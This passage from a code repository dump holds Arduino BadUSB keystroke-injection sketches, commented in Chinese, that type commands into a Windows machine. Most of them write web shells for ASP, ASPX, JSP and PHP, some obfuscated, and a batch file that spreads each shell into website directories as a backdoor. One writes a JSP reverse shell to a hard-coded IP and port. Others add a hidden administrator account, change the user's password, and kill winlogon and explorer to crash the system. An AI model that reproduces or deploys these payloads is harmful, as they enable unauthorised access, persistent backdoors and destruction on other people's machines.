  delay(200); 
  Keyboard.println("echo       ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     popd >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo ) >> hacked.bat");
  delay(200); 
  
  Keyboard.println("hacked.bat");  //放入asp网站根目录，作为后门等待连接
  delay(9000); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: Site_AWord_IntrusionCode/AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("echo ^<%@ LANGUAGE = VBScript.Encode %^> >> hacked.asp");  //向hacked.asp写内容,密码wwy
  delay(200); 
  Keyboard.println('echo ^<%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%^> >> hacked.asp');  //向hacked.asp写内容,密码c
  delay(200); 

  Keyboard.println("echo @echo off >> hacked.bat");
  delay(200); 
  Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat");  //目标文件index.aspx
  delay(200); 
  Keyboard.println("echo echo 正在更新磁盘文件，请稍候... >> hacked.bat");
  delay(200); 
  Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   if exist %%a:\ ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     pushd %%a:\ >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     for /r %%b in (*%FileName%) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     popd >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo ) >> hacked.bat");
  delay(200); 
  
  Keyboard.println("hacked.bat");  //放入asp网站根目录，作为后门等待连接
  delay(9000); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("echo ^<%@ Page Language = Jscript %^> >> hacked.aspx");  //向hacked.aspx写内容,密码-7
  delay(200);
  Keyboard.println("echo ^<%var/*-/*-*/P/*-/*-*/=/*-/*-*/'e'+'v'+/*-/*-*/ >> hacked.aspx");
  delay(200);
  Keyboard.println("echo 'a'+'l'+'('+'R'+'e'+/*-/*-*/'q'+'u'+'e'/*-/*-*/+'s'+'t'+ >> hacked.aspx");
  delay(200);
  Keyboard.println("echo '[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]'+ >> hacked.aspx");
  delay(200);
  Keyboard.println("echo ','+'\''+'u'+'n'+'s'/*-/*-*/+'a'+'f'+'e'+'\''+')';eval >> hacked.aspx");
  delay(200);
  Keyboard.println("echo (/*-/*-*/P/*-/*-*/,/*-/*-*/'u'+'n'+'s'/*-/*-*/+'a'+'f'+'e'/*-/*-*/);%^> >> hacked.aspx");
  delay(200);
  
  Keyboard.println("echo @echo off >> hacked.bat");
  delay(200); 
  Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat");  //目标文件index.aspx
  delay(200); 
  Keyboard.println("echo echo 正在更新磁盘文件，请稍候... >> hacked.bat");
  delay(200); 
  Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   if exist %%a:\ ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     pushd %%a:\ >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     for /r %%b in (*%FileName%) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     popd >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo ) >> hacked.bat");
  delay(200); 
  
  Keyboard.println("hacked.bat");  //放入asp网站根目录，作为后门等待连接
  delay(9000); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: Site_AWord_IntrusionCode/AspxSentenceTrojanWrite(webServerVersion).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println('echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["wwy"],"unsafe");%^> >> hacked.asp');  //向hacked.asp写内容,密码wwy
  delay(200); 
  
  Keyboard.println("echo @echo off >> hacked.bat");
  delay(200); 
  Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat");  //目标文件index.aspx
  delay(200); 
  Keyboard.println("echo echo 正在更新磁盘文件，请稍候... >> hacked.bat");
  delay(200); 
  Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   if exist %%a:\ ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     pushd %%a:\ >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     for /r %%b in (*%FileName%) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     popd >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo ) >> hacked.bat");
  delay(200); 
  
  Keyboard.println("hacked.bat");  //放入asp网站根目录，作为后门等待连接
  delay(9000); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: Site_AWord_IntrusionCode/JspSentenceTrojanWritten (JSP_websiteServerUse).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println('echo ^<%@page import="java.lang.*"%^>  >> hacked.jsp');  //向hacked.jsp写内容，这是一种jsp常见的一句话跳板木马，http://localhost/1.jsp?f=1.txt&t=hacker ，然后:http://localhost/1.txt 就出来了 内容为hacker，便于挂jsp大马
  delay(200); 
  Keyboard.println("echo ^<%  >> hacked.jsp");
  Keyboard.println('echo if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());  >> hacked.jsp');
  Keyboard.println("echo %^> >> hacked.jsp");

  Keyboard.println("echo @echo off >> hacked.bat");
  delay(200); 
  Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat");  //目标文件index.aspx
  delay(200); 
  Keyboard.println("echo echo 正在更新磁盘文件，请稍候... >> hacked.bat");
  delay(200); 
  Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   if exist %%a:\ ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     pushd %%a:\ >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     for /r %%b in (*%FileName%) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     popd >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo ) >> hacked.bat");
  delay(200); 
  
  Keyboard.println("hacked.bat");  //放入jsp网站根目录，作为后门等待连接
  delay(9000); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: Site_AWord_IntrusionCode/JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println('echo ^<%@page import="java.lang.*"%^>  >> hacked.jsp');  //向hacked.jsp写内容
  delay(200); 
  Keyboard.println('echo ^<%@page import="java.util.*"%^>  >> hacked.jsp');
  delay(200); 
  Keyboard.println('echo ^<%@page import="java.io.*"%^>  >> hacked.jsp');
  delay(200); 
  Keyboard.println('echo ^<%@page import="java.net.*"%^>  >> hacked.jsp');
  delay(200); 
  Keyboard.println("echo ^<%  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo   class StreamConnector extends Thread  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo   {  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     InputStream ep;  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     OutputStream wk;  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     StreamConnector( InputStream ep, OutputStream wk )  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     {  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo       this.ep = ep;  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo       this.wk = wk;  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     }  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     public void run()  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     {  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo       BufferedReader lv  = null;  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo       BufferedWriter gih = null;  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo       try  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo       {  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo         lv  = new BufferedReader( new InputStreamReader( this.ep ) );  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo         gih = new BufferedWriter( new OutputStreamWriter( this.wk ) );  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo         char buffer[] = new char[8192];  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo         int length;  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo         while( ( length = lv.read( buffer, 0, buffer.length ) ) > 0 )  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo         {  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo           gih.write( buffer, 0, length );  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo           gih.flush();  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo         }  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo       } catch( Exception e ){}  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo       try  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo       {  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo         if( lv != null )  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo           lv.close();  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo         if( gih != null )  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo           gih.close();  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo       } catch( Exception e ){}  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     }  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo   }  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo   try  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo   {  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     String ShellPath;  >> hacked.jsp");
  delay(200); 
  Keyboard.println('echo if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {  >> hacked.jsp');
  delay(200); 
  Keyboard.println('echo   ShellPath = new String("/bin/sh");  >> hacked.jsp');
  delay(200); 
  Keyboard.println("echo } else {  >> hacked.jsp");
  delay(200); 
  Keyboard.println('echo   ShellPath = new String("cmd.exe");  >> hacked.jsp');
  delay(200); 
  Keyboard.println("echo }  >> hacked.jsp");
  delay(200); 
  Keyboard.println('echo     Socket socket = new Socket( "192.168.154.131", 4444 );  >> hacked.jsp');  //改为自己主机的IP地址和对应端口号
  delay(200); 
  Keyboard.println("echo     Process process = Runtime.getRuntime().exec( ShellPath );  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo     ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo   } catch( Exception e ) {}  >> hacked.jsp");
  delay(200); 
  Keyboard.println("echo %^>  >> hacked.jsp");
  delay(200); 
  
  Keyboard.println("echo @echo off >> hacked.bat");
  delay(200); 
  Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat");  //目标文件index.aspx
  delay(200); 
  Keyboard.println("echo echo 正在更新磁盘文件，请稍候... >> hacked.bat");
  delay(200); 
  Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   if exist %%a:\ ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     pushd %%a:\ >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     for /r %%b in (*%FileName%) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     popd >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo ) >> hacked.bat");
  delay(200); 
  
  Keyboard.println("hacked.bat");  //放入jsp网站根目录，作为后门等待连接
  delay(9000); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("echo ^<?php >> hacked.php");  //向hacked.php写内容,类绕过，密码wwy
  delay(200);
  Keyboard.println("echo class shawaf >> hacked.php");
  delay(200);
  Keyboard.println("echo { >> hacked.php");
  delay(200);
  Keyboard.println("echo   public $a = ''; >> hacked.php");
  delay(200);
  Keyboard.println("echo   function __destruct(){ >> hacked.php");
  delay(200);
  Keyboard.println('echo     assert("$this->a"); >> hacked.php');
  delay(200);
  Keyboard.println("echo   } >> hacked.php");
  delay(200);
  Keyboard.println("echo } >> hacked.php");  
  delay(200);
  Keyboard.println("echo $b = new shawaf; >> hacked.php");  
  delay(200);
  Keyboard.println('echo $b->a = $_POST["wwy"]; >> hacked.php');  
  delay(200);
  Keyboard.println("echo ?^> >> hacked.php");  
  delay(200);

  Keyboard.println("echo @echo off >> hacked.bat");
  delay(200); 
  Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat");  //目标文件index.aspx
  delay(200); 
  Keyboard.println("echo echo 正在更新磁盘文件，请稍候... >> hacked.bat");
  delay(200); 
  Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   if exist %%a:\ ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     pushd %%a:\ >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     for /r %%b in (*%FileName%) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     popd >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo ) >> hacked.bat");
  delay(200); 
  
  Keyboard.println("hacked.bat");  //放入asp网站根目录，作为后门等待连接
  delay(9000); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("echo ^<?php  >> hacked.php");  //向hacked.php写内容,密码_
  delay(200); 
  Keyboard.println("echo $_=(''^'`').(''^'`').(''^'`');  >> hacked.php");  //ass
  delay(200); 
  Keyboard.println("echo $__=(''^'`').(''^'`').(''^'`');  >> hacked.php");  //ert
  delay(200); 
  Keyboard.println("echo $_ = $_.$__;  >> hacked.php");  //assert
  delay(200); 
  Keyboard.println("echo $__='_'.('\''^'`').('%'^'`').('4'^'`');  >> hacked.php");  //_GET
  delay(200); 
  Keyboard.println("echo //$__='_'.('  >> hacked.php");
  delay(200); 
  Keyboard.println("echo //'^']').('/'^'`').(''^']').('	'^']');  >> hacked.php"); //_POST
  delay(200); 
  Keyboard.println("echo $___=$$__;  >> hacked.php");
  delay(200); 
  Keyboard.println("echo @$_($___[_]);  >> hacked.php");  //@assert($_GET[_])
  delay(200); 
  Keyboard.println("echo ?^>  >> hacked.php");
  delay(200); 
  
  Keyboard.println("echo @echo off >> hacked.bat");
  delay(200); 
  Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat");  //目标文件index.aspx
  delay(200); 
  Keyboard.println("echo echo 正在更新磁盘文件，请稍候... >> hacked.bat");
  delay(200); 
  Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   if exist %%a:\ ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     pushd %%a:\ >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     for /r %%b in (*%FileName%) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     popd >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo ) >> hacked.bat");
  delay(200); 
  
  Keyboard.println("hacked.bat");  //放入asp网站根目录，作为后门等待连接
  delay(9000); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: Site_AWord_IntrusionCode/PHP_TrojanWrite(usedByPHP_websiteServer).ino
================================================
#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200); 
  Keyboard.println("echo ^<?php @eval($_POST['wwy']); ?^>  >> hacked.php");  //向hacked.php写内容,密码wwy
  delay(200); 
  
  Keyboard.println("echo @echo off >> hacked.bat");
  delay(200); 
  Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat");  //目标文件index.aspx
  delay(200); 
  Keyboard.println("echo echo 正在更新磁盘文件，请稍候... >> hacked.bat");
  delay(200); 
  Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   if exist %%a:\ ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     pushd %%a:\ >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     for /r %%b in (*%FileName%) do ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
  delay(200); 
  Keyboard.println("echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat");
  delay(200); 
  Keyboard.println("echo       ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo     popd >> hacked.bat");
  delay(200); 
  Keyboard.println("echo   ) >> hacked.bat");
  delay(200); 
  Keyboard.println("echo ) >> hacked.bat");
  delay(200); 
  
  Keyboard.println("hacked.bat");  //放入asp网站根目录，作为后门等待连接
  delay(9000); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

================================================
FILE: SpecificFunctionCode/AddUserCode(Tools).ino
================================================
#include <Keyboard.h>

void setup() {
  // 这里执行一次
  Keyboard.begin();//开始键盘通讯 
  delay(2000);//初始化时间
  Keyboard.press(KEY_LEFT_GUI); //点击win键
  delay(50); //延迟执行时间
  Keyboard.press('r'); //点击r键
  delay(50);
  Keyboard.release(KEY_LEFT_GUI); //释放win键
  Keyboard.release('r'); //释放r键
  delay(50);
  Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //打开cmd并将串口最小化
  delay(100);
  Keyboard.press(KEY_RETURN); //回车
  Keyboard.release(KEY_RETURN); //释放回车
  delay(50);
  Keyboard.println("net user test 123456 /add&net localgroup Administrators test /add"); //添加test用户
  delay(1000);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(1000);
  Keyboard.println("exit");
  delay(50);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  Keyboard.end();//结束键盘通讯 
}
 
void loop() {
  // 这里循环执行
 
}

================================================
FILE: SpecificFunctionCode/Alt-f4_Loop.ino
================================================
void setup() {//初始化
Keyboard.begin();
}
void loop()//循环
{
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
}


================================================
FILE: SpecificFunctionCode/ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200);
  Keyboard.println("CMD.EXE /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&NET USER %USERNAME% HACKED");//修改密码HACKED
  delay(200); 
  Keyboard.println("color a");//更改命令行颜色（绿色）
  delay(200); 
  Keyboard.println("echo ........................................................   >> hacked.txt");//向hacked.txt写内容
  delay(200); 
  Keyboard.println("echo ##     ##    ###     ######  ##    ## ######## ########  >> hacked.txt");//向hacked.txt写内容
  delay(200); 
  Keyboard.println("color 0");//更改命令行颜色（绿色）
  delay(200); 
  Keyboard.println("echo ##     ##   ## ##   ##    ## ##   ##  ##       ##     ##  >> hacked.txt");//向hacked.txt写内容
  delay(200); 
  Keyboard.println("color 1");//更改命令行颜色（绿色）
  delay(200); 
  Keyboard.println("echo ##     ##  ##   ##  ##       ##  ##   ##       ##     ##  >> hacked.txt");//向hacked.txt写内容
  delay(200); 
  Keyboard.println("color 2");//更改命令行颜色（绿色）
  delay(200); 
  Keyboard.println("echo ######### ##     ## ##       #####    ######   ##     ##  >> hacked.txt");//向hacked.txt写内容
  delay(200); 
  Keyboard.println("color 3");//更改命令行颜色（绿色）
  delay(200); 
  Keyboard.println("echo ##     ## ######### ##       ##  ##   ##       ##     ##  >> hacked.txt");//向hacked.txt写内容
  delay(200); 
  Keyboard.println("color 4");//更改命令行颜色（绿色）
  delay(200); 
  Keyboard.println("echo ##     ## ##     ## ##    ## ##   ##  ##       ##     ##  >> hacked.txt");//向hacked.txt写内容
  delay(200); 
  Keyboard.println("color 5");//更改命令行颜色（绿色）
  delay(200); 
  Keyboard.println("echo ##     ## ##     ##  ######  ##    ## ######## ########   >> hacked.txt");//向hacked.txt写内容
  delay(200); 
  Keyboard.println("color 6");//更改命令行颜色（绿色）
  delay(200); 
  Keyboard.println("echo ........................................................   >> hacked.txt");//向hacked.txt写内容
  delay(200); 
  Keyboard.println("color c");//更改命令行颜色（红色）
  delay(200); 
  Keyboard.println("cls");//更改命令行颜色（红色）
  delay(200); 
  Keyboard.println("type hacked.txt");//将hacked.txt文件内容打印在cmd
  delay(200); 
  Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL");//蓝屏XP、7
  delay(200); 
  Keyboard.println("taskkill /f /im explorer.exe");//删除桌面进程(all)
  delay(200); 
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: SpecificFunctionCode/EnablePSL_RemoteConnection(Tools).ino
================================================
#define BOARDTYPE
#ifdef TEENSY2
    #include<usb_private.h>
#endif

